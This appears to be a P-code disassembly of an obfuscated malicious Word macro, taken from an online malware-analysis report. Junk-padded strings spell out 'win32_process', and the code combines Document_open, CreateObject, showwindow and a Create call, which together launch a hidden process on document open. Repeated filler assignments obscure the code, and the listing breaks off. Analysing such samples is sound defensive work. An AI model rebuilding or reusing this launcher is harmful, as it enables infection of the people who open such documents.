' 	LitStr 0x0061 ":}&*$**(){wi}&*$**(){}&*$**(){n3}&*$**(){}&*$**(){}&*$**(){2}&*$**(){}&*$**(){_}&*$**(){}&*$**(){"
' 	Add 
' 	Ld Oxuzrzcyuqz 
' 	MemLd Zoom 
' 	Add 
' 	LitStr 0x0045 "r}&*$**(){}&*$**(){o}&*$**(){ce}&*$**(){s}&*$**(){}&*$**(){s}&*$**(){"
' 	Add 
' 	St Hpqcquqbbiaa 
' Line #11:
' 	LitStr 0x0015 "    fpCzbOrrBK       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St Document_open 
' Line #12:
' 	LitStr 0x0015 "    kSTokTqrAE       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St Trim 
' Line #13:
' 	LitStr 0x0015 "    vcNMCvZAtj       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St eYCgTHbUrq 
' Line #14:
' 	LitStr 0x0015 "    GeEhhzvoze       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St AepzxwaawS 
' Line #15:
' 	LitStr 0x0015 "    wjOhwARgBL       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St hRoTwUiEiW 
' Line #16:
' 	LitStr 0x000A "zSzItGhKYQ"
' 	St wqPQZAJhhx 
' Line #17:
' 	LitDI4 0xB7F4 0x0001 
' 	St EZTGslBbfq 
' Line #18:
' 	Ld wqPQZAJhhx 
' 	Ld EZTGslBbfq 
' 	Coerce (Str) 
' 	Concat 
' 	St wqPQZAJhhx 
' Line #19:
' 	Ld wqPQZAJhhx 
' 	St sPkiPWgEFY 
' Line #20:
' 	Ld Hpqcquqbbiaa 
' 	ArgsLd Wyvieuwpopbd 0x0001 
' 	St Rkgrnwuuc 
' Line #21:
' 	LitStr 0x0015 "    fpCzbOrrBK       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St Document_open 
' Line #22:
' 	LitStr 0x0015 "    kSTokTqrAE       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St Trim 
' Line #23:
' 	LitStr 0x0015 "    vcNMCvZAtj       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St eYCgTHbUrq 
' Line #24:
' 	LitStr 0x0015 "    GeEhhzvoze       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St AepzxwaawS 
' Line #25:
' 	LitStr 0x0015 "    wjOhwARgBL       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St hRoTwUiEiW 
' Line #26:
' 	LitStr 0x000A "zSzItGhKYQ"
' 	St wqPQZAJhhx 
' Line #27:
' 	LitDI4 0xB7F4 0x0001 
' 	St EZTGslBbfq 
' Line #28:
' 	Ld wqPQZAJhhx 
' 	Ld EZTGslBbfq 
' 	Coerce (Str) 
' 	Concat 
' 	St wqPQZAJhhx 
' Line #29:
' 	Ld wqPQZAJhhx 
' 	St sPkiPWgEFY 
' Line #30:
' 	SetStmt 
' 	Ld Rkgrnwuuc 
' 	ArgsLd Szsuprxwu 0x0001 
' 	Set Oiobkuwqsy 
' Line #31:
' 	LitStr 0x0015 "    fpCzbOrrBK       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St Document_open 
' Line #32:
' 	LitStr 0x0015 "    kSTokTqrAE       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St Trim 
' Line #33:
' 	LitStr 0x0015 "    vcNMCvZAtj       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St eYCgTHbUrq 
' Line #34:
' 	LitStr 0x0015 "    GeEhhzvoze       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St AepzxwaawS 
' Line #35:
' 	LitStr 0x0015 "    wjOhwARgBL       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St hRoTwUiEiW 
' Line #36:
' 	LitStr 0x000A "zSzItGhKYQ"
' 	St wqPQZAJhhx 
' Line #37:
' 	LitDI4 0xB7F4 0x0001 
' 	St EZTGslBbfq 
' Line #38:
' 	Ld wqPQZAJhhx 
' 	Ld EZTGslBbfq 
' 	Coerce (Str) 
' 	Concat 
' 	St wqPQZAJhhx 
' Line #39:
' 	Ld wqPQZAJhhx 
' 	St sPkiPWgEFY 
' Line #40:
' 	Ld Oxuzrzcyuqz 
' 	MemLd Dygqqlldxn 
' 	MemLd Tag 
' 	St CreateObject 
' Line #41:
' 	LitStr 0x0015 "    fpCzbOrrBK       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St Document_open 
' Line #42:
' 	LitStr 0x0015 "    kSTokTqrAE       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St Trim 
' Line #43:
' 	LitStr 0x0015 "    vcNMCvZAtj       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St eYCgTHbUrq 
' Line #44:
' 	LitStr 0x0015 "    GeEhhzvoze       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St AepzxwaawS 
' Line #45:
' 	LitStr 0x0015 "    wjOhwARgBL       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St hRoTwUiEiW 
' Line #46:
' 	LitStr 0x000A "zSzItGhKYQ"
' 	St wqPQZAJhhx 
' Line #47:
' 	LitDI4 0xB7F4 0x0001 
' 	St EZTGslBbfq 
' Line #48:
' 	Ld wqPQZAJhhx 
' 	Ld EZTGslBbfq 
' 	Coerce (Str) 
' 	Concat 
' 	St wqPQZAJhhx 
' Line #49:
' 	Ld wqPQZAJhhx 
' 	St sPkiPWgEFY 
' Line #50:
' 	Ld Rkgrnwuuc 
' 	Ld Oxuzrzcyuqz 
' 	MemLd ChrW 
' 	LitDI2 0x000F 
' 	Add 
' 	ArgsLd Bhwtsprjd 0x0001 
' 	Add 
' 	Ld Oxuzrzcyuqz 
' 	MemLd Loglemsf 
' 	MemLd Tag 
' 	Add 
' 	Ld CreateObject 
' 	Add 
' 	St Wldlltzabxia 
' Line #51:
' 	LitStr 0x0015 "    fpCzbOrrBK       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St Document_open 
' Line #52:
' 	LitStr 0x0015 "    kSTokTqrAE       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St Trim 
' Line #53:
' 	LitStr 0x0015 "    vcNMCvZAtj       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St eYCgTHbUrq 
' Line #54:
' 	LitStr 0x0015 "    GeEhhzvoze       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St AepzxwaawS 
' Line #55:
' 	LitStr 0x0015 "    wjOhwARgBL       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St hRoTwUiEiW 
' Line #56:
' 	LitStr 0x000A "zSzItGhKYQ"
' 	St wqPQZAJhhx 
' Line #57:
' 	LitDI4 0xB7F4 0x0001 
' 	St EZTGslBbfq 
' Line #58:
' 	Ld wqPQZAJhhx 
' 	Ld EZTGslBbfq 
' 	Coerce (Str) 
' 	Concat 
' 	St wqPQZAJhhx 
' Line #59:
' 	Ld wqPQZAJhhx 
' 	St sPkiPWgEFY 
' Line #60:
' 	Ld Wldlltzabxia 
' 	Ld Oxuzrzcyuqz 
' 	MemLd Zoom 
' 	Add 
' 	St Nvaqkmyiymb 
' Line #61:
' 	LitStr 0x0015 "    fpCzbOrrBK       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St Document_open 
' Line #62:
' 	LitStr 0x0015 "    kSTokTqrAE       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St Trim 
' Line #63:
' 	LitStr 0x0015 "    vcNMCvZAtj       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St eYCgTHbUrq 
' Line #64:
' 	LitStr 0x0015 "    GeEhhzvoze       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St AepzxwaawS 
' Line #65:
' 	LitStr 0x0015 "    wjOhwARgBL       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St hRoTwUiEiW 
' Line #66:
' 	LitStr 0x000A "zSzItGhKYQ"
' 	St wqPQZAJhhx 
' Line #67:
' 	LitDI4 0xB7F4 0x0001 
' 	St EZTGslBbfq 
' Line #68:
' 	Ld wqPQZAJhhx 
' 	Ld EZTGslBbfq 
' 	Coerce (Str) 
' 	Concat 
' 	St wqPQZAJhhx 
' Line #69:
' 	Ld wqPQZAJhhx 
' 	St sPkiPWgEFY 
' Line #70:
' 	SetStmt 
' 	Ld Nvaqkmyiymb 
' 	ArgsLd Yddwdalk 0x0001 
' 	Set Qccafrtde 
' Line #71:
' 	LitStr 0x0015 "    fpCzbOrrBK       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St Document_open 
' Line #72:
' 	LitStr 0x0015 "    kSTokTqrAE       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St Trim 
' Line #73:
' 	LitStr 0x0015 "    vcNMCvZAtj       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St eYCgTHbUrq 
' Line #74:
' 	LitStr 0x0015 "    GeEhhzvoze       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St AepzxwaawS 
' Line #75:
' 	LitStr 0x0015 "    wjOhwARgBL       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St hRoTwUiEiW 
' Line #76:
' 	LitStr 0x000A "zSzItGhKYQ"
' 	St wqPQZAJhhx 
' Line #77:
' 	LitDI4 0xB7F4 0x0001 
' 	St EZTGslBbfq 
' Line #78:
' 	Ld wqPQZAJhhx 
' 	Ld EZTGslBbfq 
' 	Coerce (Str) 
' 	Concat 
' 	St wqPQZAJhhx 
' Line #79:
' 	Ld wqPQZAJhhx 
' 	St sPkiPWgEFY 
' Line #80:
' 	LineCont 0x0004 03 00 00 00
' 	Ld Create 
' 	Ld khknasas 
' 	Add 
' 	Ld Dwbdfdaieqnpc 
' 	Add 
' 	Ld nbswe 
' 	Ld Qccafrtde 
' 	Ld Oiobkuwqsy 
' 	ArgsMemCall (Call) Vyirvuquvu 0x0003 
' Line #81:
' 	LitStr 0x0015 "    fpCzbOrrBK       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St Document_open 
' Line #82:
' 	LitStr 0x0015 "    kSTokTqrAE       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St Trim 
' Line #83:
' 	LitStr 0x0015 "    vcNMCvZAtj       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St eYCgTHbUrq 
' Line #84:
' 	LitStr 0x0015 "    GeEhhzvoze       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St AepzxwaawS 
' Line #85:
' 	LitStr 0x0015 "    wjOhwARgBL       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St hRoTwUiEiW 
' Line #86:
' 	LitStr 0x000A "zSzItGhKYQ"
' 	St wqPQZAJhhx 
' Line #87:
' 	LitDI4 0xB7F4 0x0001 
' 	St EZTGslBbfq 
' Line #88:
' 	Ld wqPQZAJhhx 
' 	Ld EZTGslBbfq 
' 	Coerce (Str) 
' 	Concat 
' 	St wqPQZAJhhx 
' Line #89:
' 	Ld wqPQZAJhhx 
' 	St sPkiPWgEFY 
' Line #90:
' 	EndFunc 
' Line #91:
' 	FuncDefn (Function Yddwdalk(Qvnzlczddco))
' Line #92:
' 	LitStr 0x0015 "    fpCzbOrrBK       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St Document_open 
' Line #93:
' 	LitStr 0x0015 "    kSTokTqrAE       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St Trim 
' Line #94:
' 	LitStr 0x0015 "    vcNMCvZAtj       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St eYCgTHbUrq 
' Line #95:
' 	LitStr 0x0015 "    GeEhhzvoze       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St AepzxwaawS 
' Line #96:
' 	LitStr 0x0015 "    wjOhwARgBL       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St hRoTwUiEiW 
' Line #97:
' 	LitStr 0x000A "zSzItGhKYQ"
' 	St wqPQZAJhhx 
' Line #98:
' 	LitDI4 0xB7F4 0x0001 
' 	St EZTGslBbfq 
' Line #99:
' 	Ld wqPQZAJhhx 
' 	Ld EZTGslBbfq 
' 	Coerce (Str) 
' 	Concat 
' 	St wqPQZAJhhx 
' Line #100:
' 	Ld wqPQZAJhhx 
' 	St sPkiPWgEFY 
' Line #101:
' 	SetStmt 
' 	Ld Qvnzlczddco 
' 	ArgsLd Szsuprxwu 0x0001 
' 	Set Yddwdalk 
' Line #102:
' 	LitStr 0x0015 "    fpCzbOrrBK       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St Document_open 
' Line #103:
' 	LitStr 0x0015 "    kSTokTqrAE       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St Trim 
' Line #104:
' 	LitStr 0x0015 "    vcNMCvZAtj       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St eYCgTHbUrq 
' Line #105:
' 	LitStr 0x0015 "    GeEhhzvoze       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St AepzxwaawS 
' Line #106:
' 	LitStr 0x0015 "    wjOhwARgBL       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St hRoTwUiEiW 
' Line #107:
' 	LitStr 0x000A "zSzItGhKYQ"
' 	St wqPQZAJhhx 
' Line #108:
' 	LitDI4 0xB7F4 0x0001 
' 	St EZTGslBbfq 
' Line #109:
' 	Ld wqPQZAJhhx 
' 	Ld EZTGslBbfq 
' 	Coerce (Str) 
' 	Concat 
' 	St wqPQZAJhhx 
' Line #110:
' 	Ld wqPQZAJhhx 
' 	St sPkiPWgEFY 
' Line #111:
' 	LineCont 0x0004 02 00 00 00
' 	Ld showwindow 
' 	Ld Rqhjugji 
' 	Add 
' 	Ld Yddwdalk 
' 	MemSt Dqtbehgj 
' Line #112:
' 	LitStr 0x0015 "    fpCzbOrrBK       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St Document_open 
' Line #113:
' 	LitStr 0x0015 "    kSTokTqrAE       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St Trim 
' Line #114:
' 	LitStr 0x0015 "    vcNMCvZAtj       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St eYCgTHbUrq 
' Line #115:
' 	LitStr 0x0015 "    GeEhhzvoze       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St AepzxwaawS 
' Line #116:
' 	LitStr 0x0015 "    wjOhwARgBL       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St hRoTwUiEiW 
' Line #117:
' 	LitStr 0x000A "zSzItGhKYQ"
' 	St wqPQZAJhhx 
' Line #118:
' 	LitDI4 0xB7F4 0x0001 
' 	St EZTGslBbfq 
' Line #119:
' 	Ld wqPQZAJhhx 
' 	Ld EZTGslBbfq 
' 	Coerce (Str) 
' 	Concat 
' 	St wqPQZAJhhx 
' Line #120:
' 	Ld wqPQZAJhhx 
' 	St sPkiPWgEFY 
' Line #121:
' 	EndFunc 
' Line #122:
' 	FuncDefn (Function Wyvieuwpopbd(Actinokzknau))
' Line #123:
' 	LitStr 0x0015 "    fpCzbOrrBK       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St Document_open 
' Line #124:
' 	LitStr 0x0015 "    kSTokTqrAE       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St Trim 
' Line #125:
' 	LitStr 0x0015 "    vcNMCvZAtj       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St eYCgTHbUrq 
' Line #126:
' 	LitStr 0x0015 "    GeEhhzvoze       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St AepzxwaawS 
' Line #127:
' 	LitStr 0x0015 "    wjOhwARgBL       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St hRoTwUiEiW 
' Line #128:
' 	LitStr 0x000A "zSzItGhKYQ"
…

Open this report in the interactive analyzer, or submit your own file for analysis.